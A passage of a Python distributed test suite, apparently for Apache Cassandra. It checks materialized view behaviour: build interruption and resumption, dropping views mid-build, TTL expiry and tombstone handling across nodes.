logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stop the cluster. Interrupt the MV build process.")
self.cluster.stop()
logger.debug("Checking logs to verify that the view build tasks have been created")
for node in self.cluster.nodelist():
assert node.grep_log('Starting new view build', filename='debug.log')
assert not node.grep_log('Resuming view build', filename='debug.log')
node.mark_log(filename='debug.log')
logger.debug("Restart the cluster")
self.cluster.start()
session = self.patient_cql_connection(node1)
session.execute("USE ks")
logger.debug("MV shouldn't be built yet.")
assert len(list(session.execute("SELECT COUNT(*) FROM t_by_v"))) != 10000
logger.debug("Wait and ensure the MV build resumed. Waiting up to 2 minutes.")
self._wait_for_view("ks", "t_by_v")
logger.debug("Verify all data")
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [10000])
for i in range(10000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
logger.debug("Checking logs to verify that some view build tasks have been resumed")
for node in self.cluster.nodelist():
assert node.grep_log('Resuming view build', filename='debug.log')
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('4.0')
def test_drop_while_building(self):
"""Test that a parallel MV build is interrupted when the view is removed"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in self.cluster.nodelist():
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Drop the MV while it is still building")
session.execute("DROP MATERIALIZED VIEW t_by_v")
logger.debug("Verify that the build has been stopped before its finalization without errors")
for node in self.cluster.nodelist():
self.check_logs_for_errors()
assert not node.grep_log('Marking view', filename='debug.log')
assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')
logger.debug("Verify that the view has been removed")
failed = False
try:
session.execute("SELECT COUNT(*) FROM t_by_v")
except InvalidRequest:
failed = True
self.assertTrue(failed, "The view shouldn't be queryable")
self._assert_view_meta(session, views=1, exists=False)
logger.debug("Create the MV again")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_drop_with_stopped_build(self):
"""Test that MV whose build has been stopped with `nodetool stop` can be dropped"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
nodes = self.cluster.nodelist()
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in nodes:
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stopping all running view build tasks with nodetool")
for node in nodes:
node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
node.nodetool('stop VIEW_BUILD')
logger.debug("Checking logs to verify that some view build tasks have been stopped")
for node in nodes:
node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
self.check_logs_for_errors()
logger.debug("Drop the MV while it is still building")
session.execute("DROP MATERIALIZED VIEW t_by_v")
logger.debug("Verify that the build has been stopped before its finalization without errors")
for node in nodes:
self.check_logs_for_errors()
assert not node.grep_log('Marking view', filename='debug.log')
assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')
logger.debug("Verify that the view has been removed")
failed = False
try:
session.execute("SELECT COUNT(*) FROM t_by_v")
except InvalidRequest:
failed = True
assert failed, "The view shouldn't be queryable"
logger.debug("Create the MV again")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_resume_stopped_build(self):
"""Test that MV builds stopped with `nodetool stop` are resumed after restart"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
nodes = self.cluster.nodelist()
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in nodes:
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stopping all running view build tasks with nodetool")
for node in nodes:
node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
node.nodetool('stop VIEW_BUILD')
logger.debug("Checking logs to verify that some view build tasks have been stopped")
for node in nodes:
node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
node.watch_log_for('Interrupted build for view', filename='debug.log', timeout=120)
assert not node.grep_log('Marking view', filename='debug.log')
self.check_logs_for_errors()
logger.debug("Check that MV shouldn't be built yet.")
assert len(list(session.execute("SELECT COUNT(*) FROM t_by_v"))) != 5000
logger.debug("Restart the cluster")
self.cluster.stop()
marks = [node.mark_log() for node in nodes]
self.cluster.start()
session = self.patient_cql_connection(nodes[0])
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM ks.t_by_v", [5000])
logger.debug("Checking logs to verify that the view build has been resumed and completed after restart")
for node, mark in zip(nodes, marks):
assert node.grep_log('Resuming view build', filename='debug.log', from_mark=mark)
assert node.grep_log('Marking view', filename='debug.log', from_mark=mark)
self.check_logs_for_errors()
@since('3.0')
def test_mv_with_default_ttl_with_flush(self):
self._test_mv_with_default_ttl(True)
@since('3.0')
def test_mv_with_default_ttl_without_flush(self):
self._test_mv_with_default_ttl(False)
def _test_mv_with_default_ttl(self, flush):
"""
Verify mv with default_time_to_live can be deleted properly using expired livenessInfo
@jira_ticket CASSANDRA-14071
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
logger.debug("MV with same key and unselected columns")
session.execute("CREATE TABLE t2 (k int, a int, b int, c int, primary key(k, a)) with default_time_to_live=600")
session.execute(("CREATE MATERIALIZED VIEW mv2 AS SELECT k,a,b FROM t2 "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (a, k)"))
session.cluster.control_connection.wait_for_schema_agreement()
self.update_view(session, "UPDATE t2 SET c=1 WHERE k=1 AND a=1;", flush)
assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 1])
assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
self.update_view(session, "UPDATE t2 SET c=null WHERE k=1 AND a=1;", flush)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
self.update_view(session, "UPDATE t2 SET c=2 WHERE k=1 AND a=1;", flush)
assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 2])
assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
self.update_view(session, "DELETE c FROM t2 WHERE k=1 AND a=1;", flush)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
if flush:
self.cluster.compact()
assert_none(session, "SELECT * FROM t2")
assert_none(session, "SELECT * FROM mv2")
# test with user-provided ttl
self.update_view(session, "INSERT INTO t2(k,a,b,c) VALUES(2,2,2,2) USING TTL 5", flush)
self.update_view(session, "UPDATE t2 USING TTL 100 SET c=1 WHERE k=2 AND a=2;", flush)
self.update_view(session, "UPDATE t2 USING TTL 50 SET c=2 WHERE k=2 AND a=2;", flush)
self.update_view(session, "DELETE c FROM t2 WHERE k=2 AND a=2;", flush)
time.sleep(5)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
if flush:
self.cluster.compact()
assert_none(session, "SELECT * FROM t2")
assert_none(session, "SELECT * FROM mv2")
logger.debug("MV with extra key")
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int) with default_time_to_live=600")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1])
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 2, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 2, 1])
assert_one(session, "SELECT * FROM mv", [1, 2, 1])
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 3, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 3, 1])
assert_one(session, "SELECT * FROM mv", [1, 3, 1])
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t", [1, 3, 1])
assert_one(session, "SELECT * FROM mv", [1, 3, 1])
# user provided ttl
self.update_view(session, "UPDATE t USING TTL 50 SET a = 4 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 4, 1])
assert_one(session, "SELECT * FROM mv", [1, 4, 1])
self.update_view(session, "UPDATE t USING TTL 40 SET a = 5 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 5, 1])
assert_one(session, "SELECT * FROM mv", [1, 5, 1])
self.update_view(session, "UPDATE t USING TTL 30 SET a = 6 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 6, 1])
assert_one(session, "SELECT * FROM mv", [1, 6, 1])
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t", [1, 6, 1])
assert_one(session, "SELECT * FROM mv", [1, 6, 1])
@flaky
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_with_flush(self):
self._test_no_base_column_in_view_pk_complex_timestamp(flush=True)
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_without_flush(self):
self._test_no_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_no_base_column_in_view_pk_complex_timestamp(self, flush):
"""
Able to shadow old view row if all columns in base are removed including unselected
Able to recreate view row if at least one selected column alive
@jira_ticket CASSANDRA-11500
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT k,c,a,b FROM t "
"WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c, k)"))
session.cluster.control_connection.wait_for_schema_agreement()
# update unselected, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 1 SET e=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, 1, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, add selected column, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
# remove selected column, view row is removed
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# update unselected with ts=3, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# insert livenesssInfo, view row should be alive
self.update_view(session, "INSERT INTO t(k,c) VALUES(1,1) USING TIMESTAMP 3", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, view row should be alive because of base livenessInfo alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=null WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# add selected column, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# update unselected, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# delete with ts=3, view row should be alive due to unselected@ts4
self.update_view(session, "DELETE FROM t USING TIMESTAMP 3 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, view row should be removed
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# add selected with ts=7, view row is alive
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
# remove selected with ts=7, view row is dead
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# add selected with ts=5, view row is alive (selected column should not affects each other)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# add selected with ttl=20 (we apparently need a long ttl because the flushing etc that self.update_view does can take a long time)
self.update_view(session, "UPDATE t USING TTL 20 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
time.sleep(20)
# update unselected with ttl=10, view row should be alive
self.update_view(session, "UPDATE t USING TTL 20 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
time.sleep(20)
# view row still alive due to base livenessInfo
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_with_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=True)
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_without_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_base_column_in_view_pk_complex_timestamp(self, flush):
"""
Able to shadow old view row with column ts greater than pk's ts and re-insert the view row
Able to shadow old view row with column ts smaller than pk's ts and re-insert the view row
@jira_ticket CASSANDRA-11500
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=1
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1])
# increase b ts to 10
self.update_view(session, "UPDATE t USING TIMESTAMP 10 SET b = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET a = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
# switch entries. shadow a = 2, insert a = 1
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a = 1 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET a = 2 WHERE k = 1;", flush, compact=True)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
# able to shadow view row even if base-column in view pk's ts is smaller than row timestamp
# set row TS = 20, a@6, b@20
self.update_view(session, "DELETE FROM t USING TIMESTAMP 5 where k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, None, 2, 10])
assert_none(session, "SELECT k,a,b,writetime(b) FROM mv")
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 6;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
self.update_view(session, "INSERT INTO t (k, b) VALUES (1, 1) USING TIMESTAMP 20;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 1, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET a = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 2, 1, 7, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 1, 20])
# switch entries. shadow a = 2, insert a = 1
self.update_view(session, "UPDATE t USING TIMESTAMP 8 SET a = 1 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 1, 1, 8, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
# create another view row
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (2, 2, 2);", flush)
assert_one(session, "SELECT k,a,b FROM t WHERE k = 2", [2, 2, 2])
assert_one(session, "SELECT k,a,b FROM mv WHERE k = 2", [2, 2, 2])
# stop node2, node3
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
logger.debug('Shutdown node3')
node3.stop(wait_other_notice=True)
# shadow a = 1, create a = 2
query = SimpleStatement("UPDATE t USING TIMESTAMP 9 SET a = 2 WHERE k = 1", consistency_level=ConsistencyLevel.ONE)
self.update_view(session, query, flush)
# shadow (a=2, k=2) after 3 second
query = SimpleStatement("UPDATE t USING TTL 3 SET a = 2 WHERE k = 2", consistency_level=ConsistencyLevel.ONE)
self.update_view(session, query, flush)
logger.debug('Starting node2')
node2.start(wait_for_binary_proto=True)
logger.debug('Starting node3')
node3.start(wait_for_binary_proto=True)
# For k = 1 & a = 1, We should get a digest mismatch of tombstones and repaired
query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
assert 0 == len(result.current_rows)
# For k = 1 & a = 1, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert_none(session, "SELECT * FROM mv WHERE k = 1 AND a = 1")
assert 0 == len(result.current_rows)
# For k = 1 & a = 2, We should get a digest mismatch of data and repaired for a = 2
query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 2", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
assert 1 == len(result.current_rows)
# For k = 1 & a = 2, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert 1 == len(result.current_rows)
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv WHERE k = 1", [1, 2, 1, 20])
time.sleep(3)
# For k = 2 & a = 2, We should get a digest mismatch of expired and repaired
query = SimpleStatement("SELECT * FROM mv WHERE k = 2 AND a = 2", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
logger.debug(result.current_rows)
assert 0 == len(result.current_rows)
# For k = 2 & a = 2, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert 0 == len(result.current_rows)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes1(self):
self._test_expired_liveness_with_limit(rf=1, nodes=1)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes3(self):
self._test_expired_liveness_with_limit(rf=1, nodes=3)
@since('3.0')
def test_expired_liveness_with_limit_rf3(self):
self._test_expired_liveness_with_limit(rf=3, nodes=3)
def _test_expired_liveness_with_limit(self, rf, nodes):
"""
Test MV with expired liveness limit is properly handled
@jira_ticket CASSANDRA-13883
"""
session = self.prepare(rf=rf, nodes=nodes, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1 = self.cluster.nodelist()[0]
session.execute('USE ks')
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
for k in range(100):
session.execute("INSERT INTO t (k, a, b) VALUES ({}, {}, {})".format(k, k, k))
# generate view row with expired liveness except for row 50 and 99
for k in range(100):
if k == 50 or k == 99:
continue
session.execute("DELETE a FROM t where k = {};".format(k))
# there should be 2 live data
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
# verify IN
keys = range(100)
assert_one(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 1".format(', '.join(str(x) for x in keys)),
[50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 2".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({})".format(', '.join(str(x) for x in keys)),
[[50, 50, 50], [99, 99, 99]])
# verify fetch size
session.default_fetch_size = 1
assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_with_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=True)
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_without_flush(self):
self._test_base_column_in_view_pk_commutative_tombstone_(flush=False)
def _test_base_column_in_view_pk_commutative_tombstone_(self, flush):
"""
view row deletion should be commutative with newer view livenessInfo, otherwise deleted columns may be resurrected.
@jira_ticket CASSANDRA-13409
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1 = self.cluster.nodelist()[0]
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
for node in self.cluster.nodelist():
node.nodetool("disableautocompaction")
# sstable 1, Set initial values TS=1
self.update_view(session, "INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 1", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, 'a', 3.0])
# sstable 2, change v's value and TS=2, tombstones v=1 and adds v=0 record
self.update_view(session, "DELETE FROM t USING TIMESTAMP 2 WHERE id = 1;", flush)
assert_none(session, "SELECT * FROM t_by_v")
assert_none(session, "SELECT * FROM t")
# sstable 3, tombstones of mv created by base deletion should remain.
self.update_view(session, "INSERT INTO t (id, v) VALUES (1, 1) USING TIMESTAMP 3", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None])
# sstable 4, shadow view row (id=1, v=1), insert (id=1, v=2, ts=4)
self.update_view(session, "UPDATE t USING TIMESTAMP 4 set v = 2 WHERE id = 1;", flush)
assert_one(session, "SELECT * FROM t_by_v", [2, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 2, None, None])
# sstable 5, shadow view row (id=1, v=2), insert (id=1, v=1 ts=5)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = 1 WHERE id = 1;", flush)
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None]) # data deleted by row-tombstone@2 should not resurrect
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
assert_one(session, "SELECT * FROM t", [1, 1, None, None]) # data deleted by row-tombstone@2 should not resurrect
# shadow view row (id=1, v=1)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = null WHERE id = 1;", flush)
assert_none(session, "SELECT * FROM t_by_v")
assert_one(session, "SELECT * FROM t", [1, None, None, None])
def test_view_tombstone(self):
"""
Test that a materialized views properly tombstone
@jira_ticket CASSANDRA-10261
@jira_ticket CASSANDRA-10910
"""
self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.max_trace_wait = 120
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=0, verify
session.execute(SimpleStatement("INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 0",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'a', 3.0]
)
session.execute(SimpleStatement("INSERT INTO t (id, v2) VALUES (1, 'b') USING TIMESTAMP 1",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
# change v's value and TS=3, tombstones v=1 and adds v=0 record
session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 3 SET v = 0 WHERE id = 1",
consistency_level=ConsistencyLevel.ALL))
self._replay_batchlogs()
assert_none(session, "SELECT * FROM t_by_v WHERE v = 1")
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
